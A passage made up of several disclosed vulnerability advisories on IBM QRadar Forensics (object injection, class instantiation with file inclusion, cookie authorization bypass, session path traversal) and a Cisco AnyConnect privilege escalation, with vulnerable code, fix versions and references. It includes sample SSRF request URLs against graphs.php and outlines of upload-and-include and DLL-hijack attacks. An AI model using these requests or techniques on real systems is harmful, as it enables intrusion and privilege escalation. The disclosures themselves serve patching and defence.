$cookieData .= $_COOKIE[$dataKey];
// All done, so delete the data cookie.
setcookie($dataKey, "", time() - 3600);
} else {
error_log("MISSING COOKIE '$dataKey'");
return null;
}
}

$sz = strlen($cookieData);
if ($sz != $dsize) {
error_log("ERROR: Graph data size incorrect: expected $dsize, got $sz");
return null;
}

try {
$dataset = unserialize(gzuncompress(base64_decode($cookieData)));
return $dataset;
} catch (Exception $e) {
error_log("Error deserializing session data: " . $e->getMessage());
$dataset = null;
}
return null;
}

The restore() method is called in the constructor of various chart
classes, which all inherit from the BaseChart class. These chart classes
are exposed in the /forensics/graphs.php page of the Forensics web
application.

/opt/ibm/forensics/html/DejaVu/Charts.php:
abstract class BaseChart extends ParameterizedObject {
[...]
public function __construct($params=null) {
[...]

$dm = empty($dmodel) ? new DataSetModeler(null) : new $dmodel(null);
if(array_key_exists('sid',$_GET))
$dm->setSessID($_GET['sid']);

$dataset = $dm->restore($dataKeys,$dsize);
[...]

It has been confirmed that this vulnerability can be used to execute
arbitrary commands by sending a specially crafted cookie to the affected
web page.

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://www.securify.nl/advisory/SFY20200406/php-object-injection-vulnerability-in-qradar-forensics-web-application.html
[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4271
[3] https://www.ibm.com/support/pages/node/6189651
[4] https://developer.ibm.com/qradar/ce/
[5] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QRSIEM-20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[6] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.3.0&platform=Linux&function=fixId&fixids=7.3.3-QRADAR-QRSIEM-20200409085709&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[7] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.3.0&platform=Linux&function=fixId&fixids=7.3.2-QRADAR-QRSIEM-20200406171249&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[8] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Incident+Forensics&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QIFFULL-2019.18.0.20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[9] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Incident+Forensics&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QIFSFS-2019.18.0.20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[10] https://www.ibm.com/security/security-intelligence/qradar
[11] https://en.wikipedia.org/wiki/Security_information_and_event_management




QRadar Community Edition 7.3.1.6 Arbitrary Object Instantiation


QRadar Community Edition version 7.3.1.6 is vulnerable to instantiation of arbitrary objects based on user-supplied input. An authenticated attacker can abuse this to perform various types of attacks including server-side request forgery and (potentially) arbitrary execution of code.


MD5 | f813c8f629536b1985d46109b98d02f8

------------------------------------------------------------------------
Arbitrary class instantiation & local file inclusion vulnerability in
QRadar Forensics web application
------------------------------------------------------------------------
Yorick Koster, September 2019

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was found that the QRadar Forensics web application is vulnerable to
instantiation of arbitrary objects based on user-supplied input. An
authenticated attacker can abuse this to perform various types of
attacks including Server-Side Request Forgery and (potentially)
arbitrary execution of code.

In addition, the same input is also used to include PHP files, which can
be used to include arbitrary local files. By abusing the case upload
functionality, it is possible for an authenticated user to upload a PHP
file to a known location on the system. By exploiting the local file
inclusion vulnerability it is possible to run arbitrary PHP code. This
code will be executed with the privileges of the Apache system user
(generally the nobody user).

------------------------------------------------------------------------
See also
------------------------------------------------------------------------
CVE-2020-4272 [2]
6189645 [3] - IBM QRadar SIEM is vulnerable to instantiation of
arbitrary objects (CVE-2020-4272)

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on QRadar Community Edition [4]
version 7.3.1.6 (7.3.1 Build 20180723171558).

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
IBM has released the following versions of QRadar in which this issue
has been resolved:

- QRadar / QRM / QVM / QNI 7.4.0 GA [5] (SFS)
- QRadar / QRM / QVM / QRIF / QNI 7.3.3 Patch 3 [6] (SFS)
- QRadar / QRM / QVM / QRIF / QNI 7.3.2 Patch 7 [7] (SFS)
- QRadar Incident Forensics 7.4.0 [8] (ISO)
- QRadar Incident Forensics 7.4.0 [9] (SFS)

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
QRadar [10] is IBM's enterprise SIEM [11] solution. A free version of
QRadar is available that is known as QRadar Community Edition [4]. This
version is limited to 50 events per second and 5,000 network flows a
minute, supports apps, but is based on a smaller footprint for
non-enterprise use.

The QRadar web application contains functionality to render various
graphs. The graph that needs to be rendered is based on user-supplied
request parameters. The correct graph and dataset classes are
dynamically loaded based on these parameters. No validation is performed
on the user-supplied parameters, allowing authenticated users to
instantiate arbitrary classes, which can be exploited to perform various
attacks including Server-Side Request Forgery and (potentially)
arbitrary execution of code via specially crafted Phar files [12].

If a dataset class is provided that has not been declared (loaded) yet,
the code tries to include the PHP file in which the class is defined.
The file name of the included file is also derived from the same
request parameter. Consequently, the web application is vulnerable to
local file inclusion.

If an attacker manages to place an arbitrary PHP file on the local
system, it is possible to abuse this issue to run arbitrary PHP code. It
was found that the case upload functionality allows uploading of PHP
files to a known location, thus allowing for the execution of arbitrary
PHP code. This code will be executed with the privileges of the Apache
system user (generally the nobody user).


------------------------------------------------------------------------
Details
------------------------------------------------------------------------
These issues are present in the graphs.php file. This PHP file accepts a
number of request parameters, including chart, dataset, and
output_image.

/opt/ibm/forensics/html/graphs.php:
// The chart and dataset class names come straight from the request.
// htmlspecialchars() only entity-encodes <, >, & and quotes; it does not
// restrict the value to a known class name, and output_image is not
// filtered at all.
$chart = ( isset($_REQUEST['chart']) ?
htmlspecialchars($_REQUEST['chart']) : null );
$dataClass = ( isset($_REQUEST['dataset']) ?
htmlspecialchars($_REQUEST['dataset']) : null );
$output_image = ( isset($_REQUEST['output_image']) ?
$_REQUEST['output_image'] : null );

If the output_image parameter is set to true, the PHP code will directly
try to instantiate an object with the name provided in the chart
parameter. One argument is passed to the constructor; its value is
obtained from a request parameter with the same name as the selected
class name. If the class is successfully loaded, the drawChart() method
is called - regardless of whether this method actually exists.

/opt/ibm/forensics/html/graphs.php:
// Present the data
// Both the class name ($chart) and the constructor argument ($cparams) are
// taken from the request; nothing restricts $chart to the chart classes this
// page is meant to serve. drawChart() is then invoked without checking that
// the instantiated object actually defines that method.
$cparams = $_REQUEST[$chart];
$cs = new $chart($cparams);
if($cs)
$cs->drawChart();

No validation is performed on the user-supplied input, allowing for
authenticated attackers to instantiate practically any object in scope
of the page. In addition, the first argument that is passed to the
constructor is also controlled by the attacker.

What an attacker might do depends on the class that is instantiated and
the code that is executed by the constructor. A possible attack scenario
would be to perform a Server-Side Request Forgery attack by
instantiating a class that calls a method supporting one of the built-in
PHP wrappers [13].

Several classes exist in the Forensics code base, like the
DistribConfigHelper class. There are also built-in PHP classes that are
in scope and also allow for Server-Side Request Forgery, like the
SplFileObject [14] class. For example:

https://<ip>/forensics/graphs.php?chart=DistribConfigHelper&DistribConfigHelper=https://127.0.0.1/&output_image=1
https://<ip>/forensics/graphs.php?chart=SplFileObject&SplFileObject=https://127.0.0.1/&output_image=1
https://<ip>/forensics/graphs.php?chart=SplFileObject&SplFileObject=php://filter/read=string.toupper/resource=https://127.0.0.1/&output_image=1

Using the same PHP wrappers it is also possible to load arbitrary Phar
[15] files from the local machine. A known attack [12] (by Sam Thomas
[16]) exists where an attacker can trigger PHP objects to be
deserialized when a Phar file is loaded. Although code execution through
deserialization is possible in the Forensics application, exploiting
this issue is not that trivial. In particular, the attack can only be
executed from an object with a __wakeup() or __destruct() PHP magic
method [17]. The classes in scope of the vulnerable page don't appear to
have suitable magic methods that could be used to execute an exploit
(POP) chain.

Besides finding a suitable magic method, exploiting the Phar wrapper
also requires that the attacker can place a Phar file on the target
systems as Phar files can't be loaded from remote locations. It was
found that the case upload functionality allows uploading of files to a
known location. However, since the graph page also contains a local file
inclusion vulnerability, it makes more sense to target that
vulnerability instead.

The vulnerable code is executed in case the output_image request
parameter isn't present or is set to false. In this case the requested
class name is provided in the dataset request parameter. If this class
isn't (yet) in scope of the PHP page, an attempt is made to load it.
This is done by iterating through a list of predefined folder names; if
a file exists with the same name as the requested class, it is
included, after which another check is done to see if the class is in
scope.

/opt/ibm/forensics/html/graphs.php:
$haveDataClass = class_exists($dataClass);
if(!$haveDataClass) {
foreach(array('', $DEJAVU_URL. 'Reports/','reports/') as $path) {
$module = $path . $dataClass . ".php";
if(file_exists($module)) {
try {
require_once($module);
$haveDataClass = class_exists($dataClass);
if($haveDataClass)
break;
} catch (Exception $e) {
// Do nothing
$msg = $e->getMessage();
}
}
}

As no validation is done on the class name, it is possible to include
files outside of these folders using path traversal. However, this isn't
really needed as the first folder that is searched is empty, thus
allowing for absolute path names. In addition, it is also possible to
provide URL type paths. The call to file_exists() will block most PHP
wrappers. Some built-in wrappers will pass through the file_exists()
call, including the ftp:// [18] and ssh2.sftp:// [19] wrappers. In
theory, it should be possible to include a file over (S)FTP, were it not that
including files from remote locations has been disabled in the PHP
configuration.

/etc/php.ini:
; http://php.net/allow-url-include
allow_url_include = Off

Because it is possible to upload arbitrary files via the case upload
functionality, it is not that difficult to run arbitrary PHP code
regardless of these restrictions. Although other methods also exist, we
can just upload a PHP file to a known location and abuse this local file
inclusion vulnerability to execute the uploaded file.

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://www.securify.nl/advisory/SFY20200407/arbitrary-class-instantiation-_-local-file-inclusion-vulnerability-in-qradar-forensics-web-application.html
[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4272
[3] https://www.ibm.com/support/pages/node/6189645
[4] https://developer.ibm.com/qradar/ce/
[5] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QRSIEM-20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[6] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.3.0&platform=Linux&function=fixId&fixids=7.3.3-QRADAR-QRSIEM-20200409085709&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[7] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.3.0&platform=Linux&function=fixId&fixids=7.3.2-QRADAR-QRSIEM-20200406171249&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[8] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Incident+Forensics&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QIFFULL-2019.18.0.20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[9] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Incident+Forensics&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QIFSFS-2019.18.0.20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[10] https://www.ibm.com/security/security-intelligence/qradar
[11] https://en.wikipedia.org/wiki/Security_information_and_event_management
[12] https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf
[13] https://www.php.net/manual/en/wrappers.php
[14] https://www.php.net/manual/en/splfileobject.construct.php
[15] https://www.php.net/manual/en/book.phar.php
[16] https://twitter.com/_s_n_t
[17] https://www.php.net/manual/en/language.oop5.magic.php
[18] https://www.php.net/manual/en/wrappers.ftp.php
[19] https://www.php.net/manual/en/wrappers.ssh2.php




QRadar Community Edition 7.3.1.6 Authorization Bypass


QRadar Community Edition version 7.3.1.6 suffers from an authorization bypass vulnerability.


MD5 | 9f24dd39f62a7f642dc8c11ad679f568

------------------------------------------------------------------------
Authorization bypass in QRadar Forensics web application
------------------------------------------------------------------------
Yorick Koster, September 2019

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was found that any authenticated user can access & use the QRadar
Forensics web application, regardless of whether they have been granted
permission to use the Forensics application. This bypass only requires
that the user manually sets a cookie named QRIF with the same value as
the user's session cookie.

------------------------------------------------------------------------
See also
------------------------------------------------------------------------
CVE-2020-4274 [2]
6189705 [3] - IBM QRadar SIEM is vulnerable to Authorization bypass
(CVE-2020-4274)

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on QRadar Community Edition [4]
version 7.3.1.6 (7.3.1 Build 20180723171558).

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
IBM has released the following versions of QRadar in which this issue
has been resolved:

- QRadar / QRM / QVM / QNI 7.4.0 GA [5] (SFS)
- QRadar / QRM / QVM / QRIF / QNI 7.3.3 Patch 3 [6] (SFS)
- QRadar / QRM / QVM / QRIF / QNI 7.3.2 Patch 7 [7] (SFS)
- QRadar Incident Forensics 7.4.0 [8] (ISO)
- QRadar Incident Forensics 7.4.0 [9] (SFS)

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
QRadar [10] is IBM's enterprise SIEM [11] solution. A free version of
QRadar is available that is known as QRadar Community Edition [4]. This
version is limited to 50 events per second and 5,000 network flows a
minute, supports apps, but is based on a smaller footprint for
non-enterprise use.

The QRadar Forensics web application is normally only accessible for
users that are granted permission to use this application. A centralized
control that checks if the user has permission is implemented in an
include file that is included in most pages. This check can be bypassed
by sending a QRIF cookie to the application. If this cookie is present
and has the same value as the SEC cookie, the permission check is not
performed. Consequently, any authenticated user can access & use the
Forensics web application.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
Most PHP pages of the Forensics application (directly or indirectly)
include the PHP file includes/functions.inc.php. A number of checks have
been implemented in this file, including a check to validate the user's
session, a check to detect Cross-Site Request Forgery attacks, and a
permission check to validate if the user has permission to use the
Forensics application. This last check is implemented in the LoginUser()
method of the QRadarHelper class.

/opt/ibm/forensics/html/DejaVu/qradar_helper.php:
public function LoginUser($sessionToken, &$errorInfo)
{
global $s, $u, $QR_HELPER_CODES;
[...]
$qrUserHasForensicsAccess = $this->GetQRuserHasForensics($qr_user_info['username']);

The call to LoginUser() is executed from the LoginCurrentUser() method,
which in turn is called from the functions.inc.php include file.

/opt/ibm/forensics/html/includes/functions.inc.php:
require_once('DejaVu/qradar_helper.php');

if (!isset($qrh))
{
$qrh = new QRadarHelper();

[...]
$errorMessage = "";
$userLoggedIn = $qrh->LoginCurrentUser(true, $errorMessage);

Before the call to LoginUser() is made, the LoginCurrentUser() method
first checks if it has received a QRIF cookie. If the cookie is present
and it has the same value of the SEC cookie (the session cookie) the
call to LoginUser() is not made. Not calling LoginUser() also means that
no check is made to validate whether the user has permission to use the
Forensics application.

/opt/ibm/forensics/html/DejaVu/qradar_helper.php:
public function LoginCurrentUser ($remember, &$errorInfo)
{
[...]
if(isset($_COOKIE['QRIF']))
{
//if the current cookie is the same as the session token that means user hasn't changed
//just update the expiry time
if ($_COOKIE['QRIF'] === $this->session_token)
{
//if cookie is available that means it hasn't expired yet so we need to update it's expiry time
//if cookie expiry time is set to 0 (expire with browser) then we don't update it
if($cookieExpiryTime > 0)
{
unset($_COOKIE['QRIF']);
setcookie("QRIF", $this->session_token, $cookieExpiryTime, "/", $_SERVER['HTTP_HOST'], true, true);
}
return true;
}
else
{
unset($_COOKIE['QRIF']);
}
}
//first time through, login the user and set the cookie
$loginSuccess = $this->LoginUser($this->session_token, $errorInfo);
if ($loginSuccess && $remember) {
setcookie("QRIF", $this->session_token, $cookieExpiryTime, "/", $_SERVER['HTTP_HOST'], true, true);
}
return $loginSuccess;
}

By manually setting a QRIF cookie, it is possible for an authenticated
user without Forensics permissions to access and use most parts of the
Forensics application. It should be noted that after passing the
LoginCurrentUser() method, another method is called that checks if the
user's session is still valid. Meaning that this bypass effectively only
bypasses the Forensics permission check.

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://www.securify.nl/advisory/SFY20200408/authorization-bypass-in-qradar-forensics-web-application.html
[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4274
[3] https://www.ibm.com/support/pages/node/6189705
[4] https://developer.ibm.com/qradar/ce/
[5] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QRSIEM-20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[6] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.3.0&platform=Linux&function=fixId&fixids=7.3.3-QRADAR-QRSIEM-20200409085709&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[7] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.3.0&platform=Linux&function=fixId&fixids=7.3.2-QRADAR-QRSIEM-20200406171249&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[8] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Incident+Forensics&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QIFFULL-2019.18.0.20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[9] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Incident+Forensics&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QIFSFS-2019.18.0.20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[10] https://www.ibm.com/security/security-intelligence/qradar
[11] https://en.wikipedia.org/wiki/Security_information_and_event_management




QRadar Community Edition 7.3.1.6 Path Traversal


QRadar Community Edition version 7.3.1.6 has a path traversal vulnerability in the session validation functionality. In particular, the vulnerability is present in the part that handles session tokens (UUIDs). QRadar fails to validate whether the user-supplied token is in the correct format. Using path traversal it is possible for authenticated users to impersonate other users, and also to execute arbitrary code (via Java deserialization). The code will be executed with the privileges of the Tomcat system user.


MD5 | 6cb180e7e16b46cc6581407a5507d0a0

------------------------------------------------------------------------
QRadar session manager path traversal vulnerability
------------------------------------------------------------------------
Yorick Koster, September 2019

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A path traversal exists in the session validation functionality of
QRadar. In particular, the vulnerability is present in the part that
handles session tokens (UUIDs). QRadar fails to validate if the
user-supplied token is in the correct format. Using path traversal it is
possible for authenticated users to impersonate other users, and also to
execute arbitrary code (via Java deserialization). The code will be
executed with the privileges of the Tomcat system user.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on QRadar Community Edition [2]
version 7.3.1.6 (7.3.1 Build 20180723171558).

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
IBM reports that as part of the Session Authenticator rewrite session
information is no longer stored on disk. Consequently, this issue is
mitigated in QRadar 7.3.2 Patch 3 and newer. In addition, it is stated
that this issue is resolved in QRadar Community Edition version 7.3.3
[3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
QRadar [4] is IBM's enterprise SIEM [5] solution. A free version of
QRadar is available that is known as QRadar Community Edition [2]. This
version is limited to 50 events per second and 5,000 network flows a
minute, supports apps, but is based on a smaller footprint for
non-enterprise use.

The QRadar web application supports several authentication methods,
including JAAS, basic authentication, OAuth, and token-based
authentication. The token-based authentication uses UUIDs, which either
represent a so-called host token or a file within the /store/sessions/
folder. Whenever QRadar encounters a session token, which is not a host
token, the sessions folder is searched for a file with the same name. If
the file exists, it will be opened and its contents will be
deserialized. The returned object is used to validate the user's
session. In some cases validation is performed on the provided token to
check if it is a properly formatted UUID. Several instances were found
where this validation is not done, allowing for path traversal attacks.

By exploiting this issue it would be possible for an attacker to open a
session file outside the sessions folder. A possible attack scenario
would be if a low privileged user uploads a file to the QRadar server
containing a serialized session object for a different user (eg, Admin)
and thus escalated privileges to that user.

No mitigations have been implemented to prevent deserialization of other
Java objects. Consequently, it is also possible to upload a file
containing other serialized objects. An authenticated attacker can
exploit this vulnerability by uploading a specially crafted (serialized)
object, which amongst other things can result in a denial of service,
change of system settings, or execution of arbitrary code.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
Deserialization of the session file happens in the class
com.q1labs.core.shared.sessionmanager.SessionManager. The session file
is retrieved by calling the getFileFromToken() method of the class
com.q1labs.core.shared.sessionmanager.UserSession.

com.q1labs.core.shared.sessionmanager.UserSession:
/**
 * Resolve the on-disk session file for a session token.
 *
 * The token is appended verbatim to the SESSION_DIR property (default
 * "/store/sessions/"); no UUID-format check or path normalization is done
 * here, so a token containing path separators or ".." resolves to a file
 * outside the sessions directory. Callers must validate the token format
 * before passing it in.
 */
public static File getFileFromToken(String sessionToken) {
return new File(NVAReader.getProperty("SESSION_DIR", "/store/sessions/") + sessionToken);
}

As can be seen in the code fragment above, the provided sessionToken
argument is directly concatenated with the SESSION_DIR configuration
property (normally /store/sessions/). If the file exists, its contents are
deserialized by the SessionManager class.

com.q1labs.core.shared.sessionmanager.SessionManager:
private UserSession deserializeSession(String sessionToken) {
UserSession retSession = null;

try {
File sessionFile = UserSession.getFileFromToken(sessionToken);
if (sessionFile.exists()) {
if (this.log.isDebugEnabled()) {
this.log.debug("Session file exists, deserializing...");
}

try {
ObjectInputStream is = new ObjectInputStream(new FileInputStream(sessionFile));
Throwable var5 = null;

try {
retSession = (UserSession)is.readObject();

The call to deserializeSession() is done from the getSession() method of
the same SessionManager class. None of these methods perform any
validation on the session token. The lack of validation allows for
directory traversal attacks if the calling methods also fail to validate
the session token format. Several instances have been found where this
is the case, thus allowing for directory traversal to happen. Some
examples of vulnerable instances include:

- com.q1labs.core.ui.servlet.RemoteJavaScript.doGet() via the sessionId
JSON property.
- com.q1labs.uiframeworks.auth.SessionAuthenticator.doAuthenticate() via
the SEC HTTP request header.
- com.q1labs.uiframeworks.util.RequestUtils.getSessionContext() via the
SEC HTTP request header.

com.q1labs.core.ui.servlet.RemoteJavaScript:
public void doGet(HttpServletRequest req, HttpServletResponse res)
throws RemoteMethodException, IOException, ServletException {
[...]
try {
if (jsonRequest.has("sessionId")) {
[...]
SessionManager sessionManager = SessionManager.getInstance();
UserSession existingSession = sessionManager.getSession(sessionId);

com.q1labs.uiframeworks.auth.SessionAuthenticator:
protected boolean doAuthenticate(Request request, HttpServletResponse
response) throws IOException {
[...]
String path;
UserSession existingSession;
[...]
path = (String)request.getSession().getAttribute("SEC");
if (path == null) {
path = request.getHeader("SEC");
}

[...]
if (session.isValid() && path != null) {
existingSession = SessionManager.getInstance().getSession(path);

com.q1labs.uiframeworks.util.RequestUtils.java:
public static ISessionContext getSessionContext(HttpServletRequest
request, boolean newSession) throws UIFrameworksException {
[...]
try {
String sessiontoken = (String)request.getSession().getAttribute("SEC");
if (sessiontoken == null) {
sessiontoken = request.getHeader("SEC");
}

[...]

userSession = sm.getSession(sessiontoken);

By exploiting this path traversal vulnerability it is possible to load
any session file that is present on the system. Normally, there should
be no session file outside of the /store/sessions folder. However
authenticated users have the possibility to upload files to known
locations. By uploading a session file and abusing the path traversal
vulnerability it is possible to impersonate any QRadar user. Even more
important, this mechanism allows for the deserialization of Java
objects. It was successfully verified that execution of arbitrary code
is possible by deserializing arbitrary Java objects.

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://www.securify.nl/advisory/SFY20200409/qradar-session-manager-path-traversal-vulnerability.html
[2] https://developer.ibm.com/qradar/ce/
[3] https://www.ibm.com/account/reg/us-en/signup?formid=urx-32552
[4] https://www.ibm.com/security/security-intelligence/qradar
[5] https://en.wikipedia.org/wiki/Security_information_and_event_management




Cisco AnyConnect Secure Mobility Client 4.8.01090 Privilege Escalation


Cisco AnyConnect Secure Mobility Client for Windows version 4.8.01090 suffers from a privilege escalation vulnerability due to insecure handling of path names.


MD5 | e5a3959bc7c5608c73bf90960397d443

------------------------------------------------------------------------
Cisco AnyConnect elevation of privileges due to insecure handling of
path names
------------------------------------------------------------------------
Yorick Koster, December 2019

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
The update functionality of the Cisco AnyConnect Secure Mobility Client
for Windows is affected by a path traversal vulnerability that allows
local attackers to create/overwrite files on arbitrary locations.
Successful exploitation of this vulnerability allows the attacker to
gain SYSTEM privileges.

------------------------------------------------------------------------
See also
------------------------------------------------------------------------
- CVE-2020-3153 [2]
- cisco-sa-ac-win-path-traverse-qO4HWBsj [3] - Cisco AnyConnect Secure
Mobility Client for Windows Uncontrolled Search Path Vulnerability
- SSD Advisory [4] - Cisco AnyConnect Privilege Elevation through Path
Traversal

------------------------------------------------------------------------
Tested version
------------------------------------------------------------------------
This issue was successfully verified on Cisco AnyConnect Secure Mobility
Client for Windows version 4.8.01090.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This vulnerability was fixed in Cisco AnyConnect Secure Mobility Client
for Windows version 4.8.02042. Cisco customers with active contracts can
obtain updates through the Software Center at
https://software.cisco.com/download/navigator.html.

Cisco has released bug ID CSCvs46327 [5] for registered users, which
contains additional details and an up-to-date list of affected product
versions.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Cisco AnyConnect Secure Mobility Client contains functionality to
auto-update itself. Auto-update also works for low-privileged users;
this is possible because the update is initiated from a service running
with SYSTEM privileges (Cisco AnyConnect Secure Mobility Agent). This
service exposes TCP port 62522 on the loopback device to which clients
can connect and send commands to be handled by this service. One of
these commands is to launch the vpndownloader application and update
AnyConnect.

A path traversal vulnerability exists in the vpndownloader application
for Windows that allows a local user to create and run files outside of
the temporary installer folder. Successful exploitation of this
vulnerability allows a local attacker to gain SYSTEM privileges.

------------------------------------------------------------------------
Vulnerability details
------------------------------------------------------------------------
The AnyConnect auto-update functionality has been affected by a number
of vulnerabilities in the past that can be abused by local users to gain
SYSTEM privileges (e.g., Kostya Kortchinsky [6], Securify [7], Project
Zero [8], SerializingMe [9]). Cisco has made a number of changes to
mitigate these attacks, amongst these changes are:

- Executables need to have a valid Authenticode signature from Cisco Systems, Inc..
- (New) versions of vpndownloader.exe are copied to %ProgramData%\Cisco\Cisco AnyConnect Secure Mobility Client\Temp\Downloader.
- Proper NTFS permissions are (now) set on the %ProgramData%\Cisco\Cisco AnyConnect Secure Mobility Client\ folder.
- The vpndownloader.exe executable must have vpndownloader.exe configured as the original filename in its version information.
- When vpndownloader.exe launches additional installation files, these files also need to have a valid Authenticode signature from Cisco Systems, Inc..
- Installation files are copied in a separate temporary folder under %ProgramData%\Cisco\Cisco AnyConnect Secure Mobility Client\Temp\Installer before they are executed.

In a nutshell, the auto-update mechanism works by sending a message to
the AnyConnect Agent to launch vpndownloader.exe and instruct it to
perform a certain action (as command line argument). This action is
either moving/copying a profile (XML) file to a profile folder or launch
a Cisco signed installer file.

Technically, this doesn't need to be an installer file, any Cisco signed
executable will do. When vpndownloader.exe is instructed to run an
installer file, the file is first copied to a temporary folder under
%ProgramData%\Cisco\Cisco AnyConnect Secure Mobility
Client\Temp\Installer. After the file has been copied, the digital
signature is checked, including the signer of the file. If everything checks
out, the file is launched from the temporary folder and the folder is
deleted after execution has completed.

Because the executable is copied to a new temporary folder, and the
folder has proper NTFS permissions it is not possible to perform a
file/DLL planting attack to run arbitrary code. In addition, the file
must be signed by Cisco and the signature must be valid, preventing the
execution of arbitrary executables.

A path traversal vulnerability exists in the step where the
(user-supplied) executable is copied into the temporary folder.
vpndownloader.exe will extract the target file name from the source file
name. Essentially it does this by searching for the last occurrence of
the backslash (\) character in the source path, the right part after the
backslash is treated as the file name and is used as the target file
name. AnyConnect does not take into account that the Windows API also
accepts the forward slash (/) as directory separator character. Because
of this it is possible to cause vpndownloader.exe to create files
outside its temporary folder.

Since the signature verification is done after the file is copied, it is
possible for an attacker to copy any file to any location residing on
the same volume as %ProgramData% (generally C:\). Copying of the file is
done with SYSTEM privileges - when vpndownloader.exe is launched through
the AnyConnect Agent. If the target file exists and SYSTEM has write
access to this file, it will be overwritten with the attacker-supplied
file. This alone is enough for a local user to gain elevated privileges.

Another attack scenario is to hijack a DLL that is loaded by a Cisco
signed executable. Most Cisco executables are affected by DLL hijacking,
a common DLL that is used by Cisco applications is the dbghelp.dll file.
The attack consists of two steps:

- Create an attacker-controlled dbghelp.dll file outside of the
temporary folder to prevent removal, traversing one folder up is enough.
- Launch a Cisco signed executable that is vulnerable to DLL hijacking
from the same folder, again using the path traversal vulnerability.

When the Cisco signed executable is launched through the AnyConnect
Agent, it will also run with SYSTEM privileges. The code in the
attacker-controlled DLL will also run with these privileges. The
application itself is opened within Session 0. Windows 10 1803 has
removed [10] the Interactive Services Detection Service, which makes it
impossible for users to interact with any GUI displayed in Session 0.
This of course does nothing to stop an attacker from gaining SYSTEM
privileges, but it does require an additional step for the attacker to
launch a GUI application with elevated privileges.

------------------------------------------------------------------------
References
------------------------------------------------------------------------
